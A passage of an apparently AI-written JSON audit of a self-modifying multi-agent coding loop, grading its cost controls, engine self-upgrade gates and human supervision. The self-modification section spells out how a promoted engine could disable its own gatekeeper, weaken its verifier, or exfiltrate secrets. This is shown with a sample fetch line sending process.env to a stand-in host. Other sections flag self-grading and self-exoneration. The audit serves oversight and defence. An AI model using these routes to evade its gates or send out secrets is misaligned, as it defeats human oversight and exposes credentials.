"impact": "While often legitimate (the harness genuinely records false failures), this is an unaudited self-exoneration loop: the same agent that failed to land work re-defines the work as already-complete and lowers its own bar to verify-only. Repeated three times, it erodes the meaning of BLOCKED and inflates the verified count.",
|
|
187
|
-
"fix": "Require reconcile decisions to cite the specific commit that shipped the artifact and a full-suite run log, and mark such tasks with a distinct RECONCILED status in METRICS (not counted as fresh verified) so a reader can separate real completion from bookkeeping cleanup.",
|
|
188
|
-
"priority": "P2"
|
|
189
|
-
}
|
|
190
|
-
]
|
|
191
|
-
},
|
|
192
|
-
{
|
|
193
|
-
"area": "Economics & Efficiency",
|
|
194
|
-
"grade": "C",
|
|
195
|
-
"working_well": [
|
|
196
|
-
"The Fable-builder tiering is a genuine, data-backed win. Builder attempt-1 runs Fable, retries run Opus (build-loop.workflow.js:419). Cumulative first-shot rate is 16/16 (100%) across the two trial runs (METRICS.jsonl last 2 lines: fableFirstShots 8/8 twice) vs the ~33% Opus baseline. Arithmetic: at 33% first-shot the Opus path averages ~3 build+verify passes/task; Fable at ~2x price but 1 pass = ~2 cost-units vs ~3 for Opus on the builder line (~33% cheaper) AND avoids ~2 full-suite Verifier re-runs per task. Blocked tasks went 2->0 (wf_c9795182 had 2 BLOCKED; both fable runs 0). Net cheaper: yes.",
|
|
197
|
-
"The engine already self-corrected two of the efficiency levers I would have flagged: engine #22 switched panel aggregation from MIN to MEDIAN (line 322), and engine #24 added a dissenter-only re-score so a single low vote no longer re-runs the whole 5-wide panel (lines 444-451). Cheap roles are correctly tiered down: roster/block/integrate run on haiku+effort:low (lines 330,437,532,571).",
|
|
198
|
-
"There IS builder-side test tiering: the Builder is told to run only a targeted subset while iterating and reserve the full suite for broad/shared-core changes (line 220), so the expensive full run is not paid on every builder inner-loop iteration.",
|
|
199
|
-
"endReason telemetry is now honest: the engine distinguishes 'iters' (true MAX_ITERS hit), 'drained', 'rounds', 'budget', 'frontier', 'planner-error' (lines 578-588), after a documented period where 'iters' was masquerading over runs that only built 4 tasks. That is exactly the kind of instrumentation needed to reason about cost."
|
|
200
|
-
],
|
|
201
|
-
"problems": [
|
|
202
|
-
{
|
|
203
|
-
"title": "No per-run cost cap — the governor throttles run FREQUENCY, not run MAGNITUDE, which is what is actually growing",
|
|
204
|
-
"evidence": "The only in-run stop conditions are MAX_ITERS=8 (line 22), MAX_ROUNDS=24 (line 24), and budget.remaining()<80000 (line 365) — but budget.total is only checked if truthy and the 80K floor is negligible. There is no wall-clock or token ceiling per run. Durations are climbing: 5.2h (fable#1) -> 8.3h (wf_c9795182) with the current run past 6h and still running. The governor (docs/USAGE-BUDGET.json) is a 2h cooldown + 120M/week BETWEEN runs.",
|
|
205
|
-
"impact": "A single pathological run can burn an unbounded fraction of the weekly 120M budget before the cooldown ever engages. The 12.1M-token TaskStopped run (USAGE-BUDGET runs[]) is the existing proof — it took a human interrupt to stop it, not the governor.",
|
|
206
|
-
"fix": "Add a hard per-run token cap (e.g. break when cumulative subagent_tokens > estPerRunTokens*1.5) and/or a wall-clock cap in the while-loop at line 363, with endReason='run-cap'. This bounds magnitude directly instead of relying on the between-run cooldown.",
|
|
207
|
-
"priority": "P1"
|
|
208
|
-
},
|
|
209
|
-
{
|
|
210
|
-
"title": "The 5-reviewer Critique panel is the single largest fixed per-task token block and runs full-width on every task regardless of blast radius",
|
|
211
|
-
"evidence": "Every task fans out to up to 6 Opus reviewers concurrently (lines 331 slice(0,6), 451 model:'opus'). At 5 reviewers x 8 tasks that is 40 Opus review calls/run, each reading the diff+context. Per-task agent budget is ~12 agents (agent_count 97 for 8 tasks, fable#2 note), so the panel alone is ~40% of per-task agents. A one-file CLI-verb change (most tasks, e.g. T-69.2, T-70.2) gets the same 5-wide panel as a shared-core/contract change.",
|
|
212
|
-
"impact": "This is the biggest single controllable token lever. Trimming to 3 reviewers for routine tasks and reserving 5-6 for shared-core/contract diffs would cut ~16 Opus review calls/run.",
|
|
213
|
-
"fix": "Scale panel width by blast radius: default 3 reviewers, escalate to the full panel only when the diff touches contracts/shared-core (the same heuristic the Builder already uses at line 220). Keep the dissenter-only re-score.",
|
|
214
|
-
"priority": "P1"
|
|
215
|
-
},
|
|
216
|
-
{
|
|
217
|
-
"title": "The authoritative Verifier re-runs the ENTIRE 3,754-test suite on every task AND every retry/rework — a quadratic cost driver with no impact-analysis tiering",
|
|
218
|
-
"evidence": "Verifier MUST run the full suite, never targeted (lines 232-235), and reworks re-verify full (line 520). Measured full suite = 2m17s wall (`npx hardhat test`, 3,754 it-blocks across 169 files). With ~1 verify/task + retries/rework that is ~11-12 full runs/run ≈ 25min of pure test wall-time per run, growing every time the loop adds a test file (and it adds ~a dozen/run).",
|
|
219
|
-
"impact": "Cost per verify grows monotonically with suite size while ~all real changes touch one module. This is why runs lengthen as the codebase grows even when verified-count is flat at 8.",
|
|
220
|
-
"fix": "Keep the full-suite gate ONCE as the final per-task verify, but run affected-file + a core smoke set for intermediate/retry/rework verifies. Or run the full suite once at end-of-run as the batch gate rather than per-task.",
|
|
221
|
-
"priority": "P2"
|
|
222
|
-
},
|
|
223
|
-
{
|
|
224
|
-
"title": "Efficiency is NOT clearly improving — per-verified cost is noisy and the 'CHEAPER/FASTER' run notes cherry-pick the best data point",
|
|
225
|
-
"evidence": "tok/verified: opus wf_7265354b 707K, opus wf_c9795182 1.57M (only 4 verified), fable#1 649K, fable#2 911K. Fable#2 (7.29M total) is the 2nd-most-expensive run in the dataset yet its note only compares fable#1's 5.19M to the worst 4-verified Opus run. Fable#2 rose 40% in tok/verified over fable#1 with identical 8/8 output.",
|
|
226
|
-
"impact": "The loop's own bookkeeping frames the tiering as a monotonic efficiency win when the trend is actually flat-to-rising once you normalize by verified count. Decisions (e.g. keeping Fable, estimating budget) rest on a favorable-comparison narrative.",
|
|
227
|
-
"fix": "Log tokens and tok/verified into METRICS.jsonl per run (currently absent — verified/avgUsefulness are there but tokens live only in USAGE-BUDGET) and track the ratio as the headline efficiency metric, not raw total or a hand-picked pairwise compare.",
|
|
228
|
-
"priority": "P2"
|
|
229
|
-
},
|
|
230
|
-
{
|
|
231
|
-
"title": "estPerRunTokens (2.44M) is 2-3x below actual, so the weekly-cap runway math is wrong",
|
|
232
|
-
"evidence": "docs/USAGE-BUDGET.json estPerRunTokens=2,440,000 while the last five real runs were 2.86M/5.19M/5.66M/6.28M/7.29M. 120M/2.44M implies ~49 runs of runway; at the real ~6M/run it is ~20. spentTokens is already 18.76M into the window.",
|
|
233
|
-
"impact": "The supervisor throttle is calibrated on a stale estimate; the loop will hit the 120M ceiling more than twice as fast as the config implies.",
|
|
234
|
-
"fix": "Set estPerRunTokens to the trailing-median of runs[] (~5.7M) and recompute it each window roll.",
|
|
235
|
-
"priority": "P3"
|
|
236
|
-
},
|
|
237
|
-
{
|
|
238
|
-
"title": "Cost denominator is wrong: every token buys speculative features for ZERO users",
|
|
239
|
-
"evidence": "The Strategist invents a fresh EPIC almost every run (65,66,67,68,69,70 across the last runs; git log shows T-65..T-70 all shipped in ~2 days) with newlyPlanned 3-9/run (METRICS.jsonl), while the product has 0 users/revenue. tok/verified is efficient at producing unrequested code.",
|
|
240
|
-
"impact": "Optimizing tokens-per-verified-task is optimizing the wrong ratio; there is no cost-per-unit-user-value because the numerator keeps growing and the denominator is zero. Reducing MAX_ITERS or gating new-EPIC invention would cut spend with no value loss until a user exists.",
|
|
241
|
-
"fix": "Lower MAX_ITERS from 8 to ~4 and/or gate Strategist EPIC-invention behind a demand signal; redirect the saved budget toward the 14 stacked needs-human/distribution proposals in STRATEGY.md.",
|
|
242
|
-
"priority": "P1"
|
|
243
|
-
}
|
|
244
|
-
],
|
|
245
|
-
"summary": "The loop spends 650K-1.57M tokens per verified task (~5-7M/run) and that ratio is noisy and flat-to-rising, not improving, once normalized by verified count — fable#2 cost 40% more per task than fable#1 for identical output. The Fable-builder tiering is a real, correctly-reasoned win (16/16 first-shot vs 33% baseline collapses the retry-times-full-suite loop), and the engine has already self-fixed the median-aggregation and dissenter-re-score levers. But the two biggest remaining levers are untouched: the 5-wide Opus review panel runs full-width on every one-file change (~40% of per-task agents), and the authoritative Verifier re-runs the entire 3,754-test (2m17s) suite on every task and every retry — a quadratic driver that lengthens runs as the codebase grows (5.2h->8.3h->6h+ ongoing). The governor design is the core structural flaw: a 2h cooldown throttles run FREQUENCY while there is no per-run token or wall-clock cap, so magnitude — the thing actually growing — is unbounded (proven by the 12.1M human-interrupted run)."
|
|
246
|
-
},
|
|
247
|
-
{
|
|
248
|
-
"area": "Self-Modification Safety (Architect engine self-upgrade + gates)",
|
|
249
|
-
"grade": "C",
|
|
250
|
-
"summary": "The two gate scripts are more thoughtfully hardened than typical (comment/string stripping so an invariant can't hide in a prompt; a smoke scenario that runs FAILING verdicts and asserts NO commit, catching the gutted-gate case that trace-order can't). But the design has a load-bearing flaw: the gate is advisory to an LLM agent, not a code chokepoint. The Gatekeeper agent runs the scripts AND executes the cp/mv promotion itself, so a hallucinating or misaligned Gatekeeper can promote a candidate that FAILED, and the newly-promoted engine then runs at the next launch with no independent mechanical re-gate. The invariant set is also narrow: it protects the verify BOOLEAN but not the verifier PROMPT (full-suite run), not panel scoring, and does nothing to detect an added network call/exfiltration or a self-disabling gate. The md5 discipline and the 'no push/deploy' guardrail are essentially manual/prompt-only, with git-remote-absence as the only real backstop. It's a serious, iterated effort that is NOT safe-by-construction.",
|
|
251
|
-
"working_well": [
|
|
252
|
-
"Comment- AND string-stripping state machine (validate-driver.cjs:19-40) means a protected token surviving only in a comment or prompt string does NOT satisfy the invariant — this closes a real earlier spoof and is genuinely careful engineering.",
|
|
253
|
-
"smoke-driver.cjs scenarios B and C (lines 78-94) run FAILING verdicts (pass:false, and pass:true/testsPass:false) and assert the engine emits NO commit label — this catches the 'gate gutted to if(true)' / unconditional-commit regression that trace-ORDER checking alone (the old harness) could not.",
|
|
254
|
-
"The live engine enforces the correctness gate consistently at every commit path (build-loop.workflow.js:430, 434, 525): `verdict && verdict.pass && verdict.testsPass` — the boolean itself is clean and not bypassed in the current engine (md5 88bf8ee0 matches memory).",
|
|
255
|
-
"Defense-in-depth reality: no git remote is configured (.git/config has none), so an accidental `git push` has no target — a real, if unintentional, backstop under the prompt-only guardrail.",
|
|
256
|
-
"Reasonable static sanity checks: AsyncFunction compile check (validate-driver.cjs:47), iteration-cap presence (MAX_ITERS/MAX_ROUNDS, line 68), a real while-loop (line 69), crash try/catch (line 72), and a 60-140% size band (lines 82-83) to catch gutting/bloat."
|
|
257
|
-
],
|
|
258
|
-
"problems": [
|
|
259
|
-
{
|
|
260
|
-
"title": "Promotion is executed by the LLM Gatekeeper agent, not by code — the gate is advisory, and an ungated engine runs at the next launch",
|
|
261
|
-
"evidence": "gatekeeperPrompt() (build-loop.workflow.js:291-298) TELLS the agent to run the two scripts and, 'If BOTH print PASS', to itself run `cp build-loop.workflow.js build-loop.prev.js && mv build-loop.next.js build-loop.workflow.js`. Nothing in code parses the scripts' exit codes or gates the mv. The engine invocation (line 671) just calls the agent and trusts it. No launcher/wrapper in the repo re-runs validate/smoke before a run (no such script under scripts/; package.json has no gate wiring).",
|
|
262
|
-
"impact": "The whole safety story reduces to 'the Gatekeeper agent complied with its prompt.' A misaligned, prompt-injected, or hallucinating Gatekeeper can promote a candidate that FAILED both gates, or skip running them entirely. Once promoted, the swapped engine is live on the very next launch with no independent mechanical re-check — the md5 in supervisor memory is checked by a human after the fact, not before the run.",
|
|
263
|
-
"fix": "Make promotion a code chokepoint the agent cannot perform: have the ENGINE (or a launch wrapper the human always runs) execute validate-driver + smoke-driver, verify exit code 0 AND exact PASS/SMOKE-PASS stdout, and do the cp/mv itself only on success. Add a pre-run guard that refuses to start if build-loop.workflow.js md5 changed without a recorded gate pass.",
|
|
264
|
-
"priority": "P0"
|
|
265
|
-
},
|
|
266
|
-
{
|
|
267
|
-
"title": "Neither gate scans for network/child_process/exfiltration — and smoke-driver EXECUTES the candidate, so exfil can happen during the smoke run itself",
|
|
268
|
-
"evidence": "grep for fetch/child_process/exec/http/curl/net in both gate scripts finds nothing (only comment text in validate-driver). smoke-driver.cjs:51-52 runs the candidate via `new AsyncFunction(...)`; AsyncFunction bodies have full access to Node globals (process, fetch, globalThis). A candidate containing `fetch('http://x/e?d='+process.env...)` compiles (validate #1 passes), stays in the size band, keeps the verdict boolean, and would be CALLED during smoke — both gates print PASS/SMOKE-PASS.",
|
|
269
|
-
"impact": "The single most dangerous class of self-modification — adding a network call or shelling out to exfiltrate keys/data or to deploy — is entirely uncaught, and the semantic gate actively runs the untrusted code that could do it.",
|
|
270
|
-
"fix": "Add a static denylist scan (fetch, require('http'/'https'/'net'/'dns'/'child_process'), process.env reads, import()) against the code-only view in validate-driver, failing on any match not on a tiny allowlist. Run smoke-driver in a sandbox with no network (e.g. a locked-down worker) rather than in-process.",
|
|
271
|
-
"priority": "P0"
|
|
272
|
-
},
|
|
273
|
-
{
|
|
274
|
-
"title": "Gate-wiring invariant is presence-of-STRING (a comment satisfies it) — an engine can delete its own Gatekeeper invocation and still PASS, disabling self-gating for all future runs",
|
|
275
|
-
"evidence": "validate-driver.cjs:76-77 checks `code.includes('scripts/validate-driver.cjs')` and `...smoke-driver.cjs` against the ORIGINAL source, so any comment or leftover prompt string satisfies them. smoke-driver never exercises the Architect/Gatekeeper path (its mock returns architect {proposed:false} at line 39 and gatekeeper {outcome:'n/a'} at line 40) and asserts nothing about them. So an engine #N+1 that removes the `agent(gatekeeperPrompt(), {label:'gatekeeper'...})` call (build-loop.workflow.js:671) but leaves the strings in a comment passes BOTH gates.",
|
|
276
|
-
"impact": "Self-gating is not self-perpetuating. One promoted engine can quietly remove the mechanism that gates the NEXT promotion, after which any candidate — including a malicious one — goes live ungated. This is the classic 'remove your own safety check' escape, and it is not caught.",
|
|
277
|
-
"fix": "In smoke-driver, run a scenario where the mock architect returns {proposed:true} and assert a gatekeeper:* label actually fires and that the promotion path invokes both scripts. Add an executable-code (not string) invariant that the gatekeeper agent call exists.",
|
|
278
|
-
"priority": "P1"
|
|
279
|
-
},
|
|
280
|
-
{
|
|
281
|
-
"title": "Verifier prompt substance and panel scoring are unprotected — 'run the FULL suite' and the entire critique/usefulness system can be gutted while both gates pass",
|
|
282
|
-
"evidence": "The 'run the FULL suite in its entirety' instruction lives only in the verifierPrompt STRING (build-loop.workflow.js:232-236), and TEST_CMD (line 27) even tells the agent to switch to whatever command STRATEGY.md records — so the 'full suite' can be redirected to a trivial command via a doc edit. validate-driver protects only the `verdict.pass && verdict.testsPass` boolean, not what makes testsPass true; smoke-driver MOCKS verify entirely (line 36) so it never checks that real tests run. Nothing in either gate references the 5-reviewer panel, usefulness floor, or rework trigger.",
|
|
283
|
-
"impact": "The Architect can rewrite the verifier to be lenient (or to run a subset / a doctored TEST_CMD) and rewrite the panel to a single rubber-stamp reviewer — the loop keeps 'verifying' and committing while the correctness and quality gates are hollowed out — and both self-upgrade gates print PASS.",
|
|
284
|
-
"fix": "Add invariants that the verifier prompt contains the literal full-suite mandate and a pinned TEST_CMD (not a STRATEGY.md-redirectable one), and that panel size / usefulness-floor constants stay within a protected range. Better: pin the verifier and reviewer prompts in a file the Architect is not allowed to edit.",
|
|
285
|
-
"priority": "P1"
|
|
286
|
-
},
|
|
287
|
-
{
|
|
288
|
-
"title": "'Local commits only, never push/deploy' is enforced only in prompt text — no git hook, no code guard; guard-scope.cjs is unwired and protects the wrong thing",
|
|
289
|
-
"evidence": "The HARD GUARDRAILS (build-loop.workflow.js:50-52) are prompt text. .git/hooks/ contains only samples (no pre-push/pre-commit). guard-scope.cjs exists but is not wired to any git hook (grep finds no pre-commit/pre-push references) and only protects /home/prerender-service (PROTECT array), not the push/deploy action. validate-driver.cjs:62 merely requires the STRINGS 'git push'/'deploy' to appear somewhere in source (they already do, in the guardrail block) — it does not detect an ADDED push.",
|
|
290
|
-
"impact": "If an agent (or a promoted engine) ran `git remote add` + `git push`, or invoked the deploy scripts, nothing in code would stop it; the only real barrier is the accidental absence of a configured remote. The guardrail is aspirational, not enforced.",
|
|
291
|
-
"fix": "Install an actual pre-push hook that hard-fails, wire guard-scope (or an equivalent) into pre-commit, and remove/lock the deploy scripts behind a credential the loop process does not hold.",
|
|
292
|
-
"priority": "P1"
|
|
293
|
-
},
|
|
294
|
-
{
|
|
295
|
-
"title": "prev.js rollback is single-depth, overwritten on every promotion, and destroyable by a malicious engine — no invariant preserves the backup step and no integrity pin",
|
|
296
|
-
"evidence": "The Gatekeeper does `cp build-loop.workflow.js build-loop.prev.js` on each promotion (build-loop.workflow.js:295), so prev.js always holds only the immediately-prior engine — after two promotions the original good engine is gone. validate-driver has NO invariant requiring the candidate to preserve the prev.js backup (grep for 'prev' in the gate finds nothing), so engine #N+1 can regenerate a gatekeeperPrompt that omits or corrupts the backup and still pass. prev.js is not md5-pinned anywhere.",
|
|
297
|
-
"impact": "A single bad promotion that survives one run can overwrite the only rollback copy with itself, and a deliberately hostile engine can destroy the rollback path outright — leaving no clean revert target.",
|
|
298
|
-
"fix": "Keep an append-only, timestamped, md5-pinned archive of every promoted engine that the loop cannot overwrite; add a validate-driver invariant that the promotion path preserves an untouched backup.",
|
|
299
|
-
"priority": "P2"
|
|
300
|
-
},
|
|
301
|
-
{
|
|
302
|
-
"title": "The md5 discipline (88bf8ee0) is purely manual/documentary and the conditional-guard regex is spoofable",
|
|
303
|
-
"evidence": "grep for the hash across the repo finds it only in docs/USAGE-BUDGET.json:108 (a human note) and MEMORY.md — no code computes or checks it before a run. Separately, validate-driver.cjs:55 accepts the gate if `(if|while|!|return|&&|?)` appears within 48 chars before `verdict.pass && verdict.testsPass`, which `if (true || (verdict.pass && verdict.testsPass))` satisfies while defeating the guard (smoke catches the naive unconditional-commit case, but not every rewrite that keeps a commit reachable on a non-failing path).",
|
|
304
|
-
"impact": "The engine-fingerprint tripwire depends entirely on the human noticing a changed hash during after-the-fact reconciliation; it blocks nothing automatically. The regex gives false confidence that the boolean is used as a real guard.",
|
|
305
|
-
"fix": "Automate the md5 check in the pre-run gate (refuse to launch on an unrecorded engine hash). Replace the proximity regex with an AST check that the gate dominates the commit call.",
|
|
306
|
-
"priority": "P2"
|
|
307
|
-
}
|
|
308
|
-
]
|
|
309
|
-
},
|
|
310
|
-
{
|
|
311
|
-
"area": "The Supervision Layer (human-facing supervisor session above the engine)",
|
|
312
|
-
"grade": "C",
|
|
313
|
-
"summary": "The supervision layer is unusually honest and its governance judgment is strong — the ledger notes are a model of forensic bookkeeping, and the human/loop guardrail line held under real pressure (real funds sent, guardrail-removal requested, declined). But the mechanics are structurally fragile: all end-of-run bookkeeping is manual supervisor arithmetic that is orphaned if the run's tail or the supervisor session dies (this has already happened twice), completion detection relies on ScheduleWakeup prompt text that has already been lost across a compaction, and the 120M-token \"governor\" measures a quantity that has never once been the binding constraint. The single highest-leverage fix — having the engine write its own run record atomically — is already an identified-but-unshipped finding.",
|
|
314
|
-
"working_well": [
|
|
315
|
-
"Ledger audit hygiene is genuinely excellent: every run note in USAGE-BUDGET.json distinguishes authoritative (subagent_tokens) vs estimated tokens, records partial-run failures, 529 deaths, window rolls, and why (e.g. lines 71, 87, 94). This is better provenance than most production billing systems.",
|
|
316
|
-
"Governance judgment held under pressure: real-funds-sent-guardrails-held.md documents the user sending real crypto and asking to remove guardrails on a self-modifying loop; the supervisor declined, urged reclaim, and preserved the supervised-deploy vs autonomous-wallet distinction. That is the single most important call in the whole system and it was made correctly.",
|
|
317
|
-
"Fail-safe direction is correct: cap policy is pause-and-wait and the ceiling is explicitly a backstop while cooldown is the primary lever (loop-spend-governor.md line 21), so erring low is harmless.",
|
|
318
|
-
"The Fable trial was run as a real controlled experiment with a pre-registered kill criterion (fableFirstShots emitted to METRICS, revert-if <=33% baseline) rather than vibes — fable-trial-engine-23.md line 20.",
|
|
319
|
-
"Site re-deploy was correctly moved from fully-human to AUTO+NOTIFY at park points with a reversible webroot backup and bounded allowlist (website-verifyhash-com-live.md line 14), removing a recurring human step without removing the safety net."
|
|
320
|
-
],
|
|
321
|
-
"problems": [
|
|
322
|
-
{
|
|
323
|
-
"title": "End-of-run bookkeeping is orphaned if the run tail or supervisor dies — the engine does not self-record",
|
|
324
|
-
"evidence": "USAGE-BUDGET.json line 87 (run wf_5b304124-b3d: Critique/commit/Report/Manager/Architect 'FAILED on the subscription WEEKLY LIMIT') and line 94 (run wf_c9795182-acb: 'Manager/Reporter/Architect died on API 529 Overloaded so METRICS.jsonl line NOT written and these planning files were committed manually'). METRICS.jsonl has 31 lines but ledger reconstruction was manual for these.",
|
|
325
|
-
"impact": "SPOF analysis answer: the launched workflow run itself likely completes, but the run RECORD does not — token accounting, the METRICS line, engine re-gate, and window math are all supervisor-side and silently lost on any tail failure, forcing error-prone manual reconstruction. Right now 15 commits across EPIC-69/70 sit past the last ledgered run with no record at all.",
|
|
326
|
-
"fix": "Ship the known driver-writes-METRICS finding AND extend it: have the engine append {runId, tokens, endEpoch, endReason} to USAGE-BUDGET.json.runs[] and write its METRICS.jsonl line atomically as its FIRST end-of-run action, before the fragile Manager/Reporter/Architect subagents that keep dying on 529/limits.",
|
|
327
|
-
"priority": "P0"
|
|
328
|
-
},
|
|
329
|
-
{
|
|
330
|
-
"title": "Completion detection depends on ScheduleWakeup prompt text that has already been lost",
|
|
331
|
-
"evidence": "Known incident (a): a scheduled relaunch wakeup was lost during a session compaction/model-switch — run 3 launched ~1.5h late and only because the user happened to ask a question. loop-spend-governor.md line 87 also notes 'notification epoch lost across compaction'. Supervision state living in re-threaded prompt text is called out in the task framing itself.",
|
|
332
|
-
"impact": "The loop's liveness depends on a human noticing it stalled. A lost wakeup at the weekly-cap boundary or during a cooldown means the loop silently stops (or launches late), and there is no independent watchdog.",
|
|
333
|
-
"fix": "Replace periodic ScheduleWakeup re-threading with a Monitor/file-watch on an engine-written completion sentinel (e.g. the new atomic ledger append), or a CronCreate heartbeat that re-derives state from the committed ledger rather than from carried-over prompt text.",
|
|
334
|
-
"priority": "P1"
|
|
335
|
-
},
|
|
336
|
-
{
|
|
337
|
-
"title": "The 120M-token governor measures a quantity that has never been the binding constraint",
|
|
338
|
-
"evidence": "loop-spend-governor.md line 23: the loop was actually stopped when 'subscription weekly usage hit 47% overall / 62% of the Fable weekly allowance' and explicitly 'the internal 120M repo governor was NOT the binding constraint; the subscription's own weekly limits were.' Current spentTokens 18.76M is only ~16% of the 120M ceiling — it has never come close to binding.",
|
|
339
|
-
"impact": "The primary automated safety number is decorative. The real limit (subscription weekly allowance, per-model for Fable) is invisible to the ledger and had to be eyeballed by the human, defeating the purpose of a governor.",
|
|
340
|
-
"fix": "Track the actual binding constraint: record per-model token spend and compare against the subscription weekly allowance (or set ceilingTokens to a value derived from it), so pause-at-cap fires on the limit that actually stops the loop.",
|
|
341
|
-
"priority": "P1"
|
|
342
|
-
},
|
|
343
|
-
{
|
|
344
|
-
"title": "Operational protocol lives in machine-local memory, not a committed repo runbook",
|
|
345
|
-
"evidence": "find for '*runbook*' returns nothing; docs/ has no SUPERVISOR-RUNBOOK. The entire relaunch/reconcile/pause protocol exists only in ~/.claude/projects/.../memory/loop-spend-governor.md, which is unversioned, machine-local, and has already proven lossy across compaction.",
|
|
346
|
-
"impact": "The protocol cannot be diffed, reviewed, or recovered by a fresh operator cloning the repo, and memory is exactly the store that was shown to drop state. Answer to Q4: memory is the wrong home for protocol state.",
|
|
347
|
-
"fix": "Commit docs/SUPERVISOR-RUNBOOK.md with the launch/cooldown/cap/reconcile/deploy steps; keep memory as a pointer to it. Version the protocol with the product it governs.",
|
|
348
|
-
"priority": "P1"
|
|
349
|
-
},
|
|
350
|
-
{
|
|
351
|
-
"title": "Supervisor does hand arithmetic on stale fields; one Edit already failed on a wrong field name",
|
|
352
|
-
"evidence": "Known incident (c): a manual Edit to USAGE-BUDGET.json once failed on a wrongly-assumed field name. estPerRunTokens is 2,440,000 (line 10) while the actual mean is 5,652,849 and last-6 mean 6,570,578 — a 2.3-2.7x stale estimate that is never updated. spentTokens is a hand-maintained sum.",
|
|
353
|
-
"impact": "Manual arithmetic on a JSON ledger by a language model is a standing correctness risk (off-by-one runs, wrong field, forgotten window roll), and the stale per-run estimate makes any capacity planning off by ~2.5x.",
|
|
354
|
-
"fix": "Once the engine writes records atomically (P0), delete the hand-math step entirely and auto-derive estPerRunTokens as a rolling mean of runs[] rather than a frozen literal.",
|
|
355
|
-
"priority": "P2"
|
|
356
|
-
},
|
|
357
|
-
{
|
|
358
|
-
"title": "Ledger lags repo reality with no incremental record between park points",
|
|
359
|
-
"evidence": "git log shows 15 commits (EPIC-69 through T-70.3, latest 2026-07-03T04:11) after the last ledgered run wf_1f634aeb-b9f (ended 2026-07-02T18:56); loop-spend-governor.md names the stop-run wf_72ed879b-35c which does not appear in USAGE-BUDGET.json at all.",
|
|
360
|
-
"impact": "Mid-run, git commits are the ONLY record of work done; if the run never reaches its (fragile) reconcile phase, that work is invisible to the budget ledger. The named stop-run existing in memory but not the ledger is exactly this drift.",
|
|
361
|
-
"fix": "Covered by the P0 atomic-append: write the run row at run start (status=active) and finalize tokens at end, so an interrupted run still leaves a durable, greppable ledger entry.",
|
|
362
|
-
"priority": "P2"
|
|
363
|
-
}
|
|
364
|
-
]
|
|
365
|
-
},
|
|
366
|
-
{
|
|
367
|
-
"area": "The Outside Skeptic — startup-CTO / AI-safety read on the whole operation",
|
|
368
|
-
"grade": "C-",
|
|
369
|
-
"working_well": [
|
|
370
|
-
"Guardrail discipline is genuinely excellent and rare. STRATEGY.md lines 6-10 hard-forbid push/deploy/real-funds/real-keys, and the loop has held it across 296 commits — every outward or legal action is parked as a `needs-human` proposal (P-1..P-11). The refusal to issue a token-as-security (MEMORY 'crypto line', P-1 recommends soulbound Option A) is exactly the right instinct that most crypto-adjacent autonomous agents get catastrophically wrong.",
|
|
371
|
-
"Honesty about what the product does NOT prove is best-in-class. README lines 78-102 and the in-band trust notes repeatedly disclaim: uri is untrusted, timestamp != authorship, one-shot anchor is front-runnable, a manifest is NOT a timestamp. This is the opposite of the usual crypto overclaim. A real buyer's security reviewer would respect this.",
|
|
372
|
-
"Engineering rigor: 3843 tests / 185 test files, full-suite gate before every commit, two-gate engine self-upgrade (validate-driver + smoke-driver) with a build-loop.prev.js rollback. The reconcile-not-rebuild decisions (T-46.1/T-61.1/T-63.1 in STRATEGY Decisions) show the loop resisting the urge to thrash working code — mature judgment.",
|
|
373
|
-
"Cost efficiency is remarkable: USAGE-BUDGET.json shows ~5-7M tokens/run, ~18.7M this window on a ~$200/mo plan, for 10 days of continuous multi-agent building. Whatever else is wrong, it is not burning money fast.",
|
|
374
|
-
"The Fable trial was run as an actual experiment with a pre-registered kill criterion (MEMORY: remove if first-shot <= ~33% Opus baseline) and measured 16/16 first-shot over two runs — that is disciplined ops."
|
|
375
|
-
],
|
|
376
|
-
"problems": [
|
|
377
|
-
{
|
|
378
|
-
"title": "The operation has no external-validation loop at all — it is a closed system optimizing a number only it can see",
|
|
379
|
-
"evidence": "72 epics, 7 distinct products (docs/: DATALEDGER, PROOFPARCEL, EVIDENCE, AGENTTRACE, TRUSTLEDGER, IDENTITY, INTEGRITY-JOURNAL), a live Polygon-mainnet contract (README:13) and live site — with ZERO users and ZERO revenue. git log has no customer/sale/pilot commit that is not the loop talking to itself. Every revenue path terminates at a `needs-human` gate the loop cannot cross.",
|
|
380
|
-
"impact": "10 days and 296 commits have produced zero evidence that anyone outside the loop wants any of this. The loop literally cannot fail its own test, because its test has no market term in it. This is the single most dangerous property of the whole setup.",
|
|
381
|
-
"fix": "Stop building features tomorrow. The human does ONE thing: put the existing free zero-install verifier in front of 10 real people in one buyer segment and watch whether a single one uses it twice. Feed that binary signal back as the top-line metric. No new epic until that number is non-zero.",
|
|
382
|
-
"priority": "P0"
|
|
383
|
-
},
|
|
384
|
-
{
|
|
385
|
-
"title": "The `needs-human` queue is the real bottleneck, it is GROWING not shrinking, and the loop keeps handing the tired human MORE decisions",
|
|
386
|
-
"evidence": "docs/METRICS.jsonl shows humanGated pinned at 3 for the entire current window (lines 29-31: 3,3,3) and it has hovered 3-5 for a month. STRATEGY.md now stacks P-1 through P-11. The Direction note (STRATEGY:113-115) openly says humanGated is 'PINNED at 3 all window' so the run 'aims auto-buildable work AT the dam' — i.e. it builds around the blockage instead of resolving it.",
|
|
387
|
-
"impact": "The one human is the rate limiter, is described as tired and wanting the AI to decide more, and the loop's response is to widen the dam (P-1..P-11) rather than help drain it. Value is being manufactured upstream of a clog and will never reach a customer until the human makes ~3 decisions (price, provision a key, pick a trust-root).",
|
|
388
|
-
"fix": "Collapse the 11 proposals to the 3 that gate first-dollar (P-1 already has a recommended default; P-2 Amoy testnet; P-6 price+vendor key). Present them as a single one-page decision with defaults pre-filled and a 'reply YES to accept all defaults' option. Freeze invention of new needs-human items until the queue is under 2.",
|
|
389
|
-
"priority": "P0"
|
|
390
|
-
},
|
|
391
|
-
{
|
|
392
|
-
"title": "The 4.13/5 usefulness self-grade is graded on a curve — it is 5 Claude personas scoring the loop's own output with no market term",
|
|
393
|
-
"evidence": "avgUsefulness trend in METRICS.jsonl: 3.75 -> 2.5 -> 3.38 -> 3.88 -> 4.13 (line 31), panelSize 5. The Architect's own promoted upgrade (STRATEGY:145-159) admits the score is a panel min-of-mins 'monotonically sensitive to panel width' — the team already knows the number is a measurement artifact, yet it remains the headline quality signal.",
|
|
394
|
-
"impact": "A rising internal usefulness score while revenue stays at zero is not evidence of progress; it is the loop learning to please its own reviewers. The 4.13 is the highest ever recorded in the exact window where the product got zero external traction — a textbook proxy-metric divergence.",
|
|
395
|
-
